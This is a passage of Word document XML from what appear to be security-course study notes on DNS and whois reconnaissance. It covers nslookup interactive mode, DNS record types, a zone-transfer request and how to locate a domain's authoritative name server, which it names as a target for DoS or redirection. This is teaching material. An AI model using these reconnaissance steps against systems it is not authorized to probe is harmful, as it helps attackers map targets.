            <w:r w:rsidRPr="0069553B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0069553B">
              <w:t>Look up a host not in the current domain.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A27D33" w14:textId="613B0280" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0069553B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>q</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>=A</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Query type A, IPv4</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A93B3A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>q=AAAA</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Query IPv6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76802" w14:paraId="7EEFD90D" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="74678A78" w14:textId="2358266E" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:t>11.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="43381E52" w14:textId="65C2156A" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5169FBF2" w14:textId="263949E9" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:t xml:space="preserve">The command </w:t>
            </w:r>
            <w:r w:rsidRPr="00A93B3A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nslookup </w:t>
            </w:r>
            <w:r>
              <w:t>can be entered on its own to enter the interactive mode. Then use these keywords to change what is you are looking for:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FFC000"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:r w:rsidRPr="00130605">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FFC000"/>
              </w:rPr>
              <w:t>(CMD only)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FFC000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F74A02">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB58F6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F74A02">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>DNSERVERNAME</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Request a zone transfer of the specified server</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008F18C7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>set type=</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>set the query type you’re looking for</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F3488E" w14:textId="1365004D" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:t xml:space="preserve">These are the most common types of DNS record types (use </w:t>
            </w:r>
            <w:r w:rsidRPr="008F18C7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>se</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">t </w:t>
            </w:r>
            <w:r w:rsidRPr="008F18C7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>type=</w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>LETTER</w:t>
            </w:r>
            <w:r>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A23152B" w14:textId="35336107" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="009C3475">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">A </w:t>
            </w:r>
            <w:r>
              <w:t>= IP address (Alias)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">● </w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>MX</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> = Directs mail to an e-mail server (Mail Xchange)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">● </w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TXT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> = For an admin to store text in the record (human or machine-readable notes)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">● </w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> record = Stores the name server for a DNS entry</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">● </w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>CNAME</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> = Forwards one domain/subdomain to another, doesn’t provide an IP</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">● </w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>SOA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> = Stores admin info about a domain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">● </w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>SRV</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> = Specifies a port for specific services</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">● </w:t>
            </w:r>
            <w:r w:rsidRPr="00452148">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PTR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> = Provides a domain name in reverse-lookups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76802" w14:paraId="06904D28" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5266BE09" w14:textId="358C2077" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:t>11.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4A9531EA" w14:textId="61BC7A91" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46214CE8" w14:textId="6FFCD450" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76802" w14:paraId="66B93832" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4DEB3BE1" w14:textId="7EBF0F82" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:t>11.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5465187A" w14:textId="77777777" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4568F62F" w14:textId="7A79C93E" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:t>If results that returned are ‘Non-authoritative’, this means you need to obtain the domain’s authoritative name server. To do so, enter this in interactive mode:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F90D78">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>set type=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F90D78">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>cname</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Then, the domain name again and you should be returned with the domain’s authoritative name server, along with the mail server.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Next, we need to obtain the IP address of the name server:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F90D78">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>set type=</w:t>
            </w:r>
            <w:r w:rsidRPr="00F90D78">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F90D78">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ns1.bluehost.com</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>(Or whichever the primary name server was)</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>This will now give you the IP address of the authoritative name server for the original domain you were searching for in nslookup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C76802" w14:paraId="06718831" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2339602C" w14:textId="02C2F840" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r>
              <w:t>11.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6B2B4469" w14:textId="77777777" w:rsidR="00C76802" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75EC5478" w14:textId="5EC8DADA" w:rsidR="00C76802" w:rsidRPr="001B1E76" w:rsidRDefault="00C76802" w:rsidP="0043739D">
            <w:r w:rsidRPr="00452148">
              <w:t>The authoritative name server stores the records associated with the domain. So, if an attacker can determine the authoritative name server (primary name server) and obtain its associated IP address, he/she might attempt to exploit the server to perform attacks such as DoS, DDoS, URL Redirection, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B1E76" w14:paraId="69EA4E7F" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1CB2E2CA" w14:textId="35435B03" w:rsidR="001B1E76" w:rsidRDefault="001B1E76" w:rsidP="0043739D">
            <w:r>
              <w:t>11.</w:t>
            </w:r>
            <w:r w:rsidR="00F90D78">
              <w:t>h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="15B32F09" w14:textId="2BD846AD" w:rsidR="001B1E76" w:rsidRDefault="001B1E76" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>whois website</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002B6C56">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(whois.domaintools.com)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="162022F8" w14:textId="45303776" w:rsidR="001B1E76" w:rsidRDefault="001B1E76" w:rsidP="0043739D">
            <w:r w:rsidRPr="001B1E76">
              <w:t>Whois is a query and response protocol used for querying databases that store the registered users or assignees of an Internet resource such as a domain name, an IP address block, or an autonomous system. This protocol listens to requests on port 43 (TCP). Regional Internet Registries (RIRs) maintain Whois databases, and contains the personal information of domain owners.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B1E76" w14:paraId="6327EBF0" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7E8EF246" w14:textId="12802A89" w:rsidR="001B1E76" w:rsidRDefault="00452148" w:rsidP="0043739D">
            <w:r>
              <w:t>11.i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4CF162D6" w14:textId="77777777" w:rsidR="001B1E76" w:rsidRDefault="001B1E76" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63698BE0" w14:textId="78825544" w:rsidR="001B1E76" w:rsidRPr="001B1E76" w:rsidRDefault="001B1E76" w:rsidP="0043739D">
            <w:r w:rsidRPr="001B1E76">
              <w:t>You can also use other Whois lookup tools such as SmartWhois (</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://www.tamos.com</w:t>
            </w:r>
            <w:r w:rsidRPr="001B1E76">
              <w:t>), Batch IP Converter (</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>http://www.sabsoft.com</w:t>
            </w:r>
            <w:r w:rsidRPr="001B1E76">
              <w:t>), etc. to extract additional target Whois information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C61877" w14:paraId="46F277ED" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6ECF9C1D" w14:textId="26E77F7F" w:rsidR="00C61877" w:rsidRDefault="00C61877" w:rsidP="0043739D">
            <w:r>
              <w:t>11.j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2DA4FC92" w14:textId="0C7211FC" w:rsidR="00C61877" w:rsidRDefault="00C61877" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nslookup website</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(kloth.net/services/</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>nslookup.php)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2D7A4694" w14:textId="62BA35FB" w:rsidR="00C61877" w:rsidRPr="001B1E76" w:rsidRDefault="00C61877" w:rsidP="0043739D">
            <w:r w:rsidRPr="00C61877">
              <w:t>You can also perform the same operations using the NSLOOKUP online tool. Conduct a series of queries and review the information to gain familiarity with the NSLOOKUP tool and gather information</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Visit: </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>http://www.kloth.net/services/nslookup.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C61877" w14:paraId="2A33F7B1" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3A8EE1BA" w14:textId="5A24FC01" w:rsidR="00C61877" w:rsidRDefault="00C61877" w:rsidP="0043739D">
            <w:r>
              <w:t>11.K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="16767836" w14:textId="77777777" w:rsidR="00C61877" w:rsidRDefault="00C61877" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7941" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59EE68B6" w14:textId="250E2EBB" w:rsidR="00C61877" w:rsidRPr="00C61877" w:rsidRDefault="00C61877" w:rsidP="0043739D">
            <w:r w:rsidRPr="00C61877">
              <w:t>You can also use DNS lookup tools such as Professional Toolset (</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://tools.dnsstuff.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00C61877">
              <w:t>), DNS Records (</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://network-tools.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00C61877">
              <w:t>), etc. to extract additional target DNS information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009102F1" w14:paraId="526BEABB" w14:textId="77777777" w:rsidTr="001B1E76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="68ECA815" w14:textId="77777777" w:rsidR="009102F1" w:rsidRDefault="009102F1" w:rsidP="0043739D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2471" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
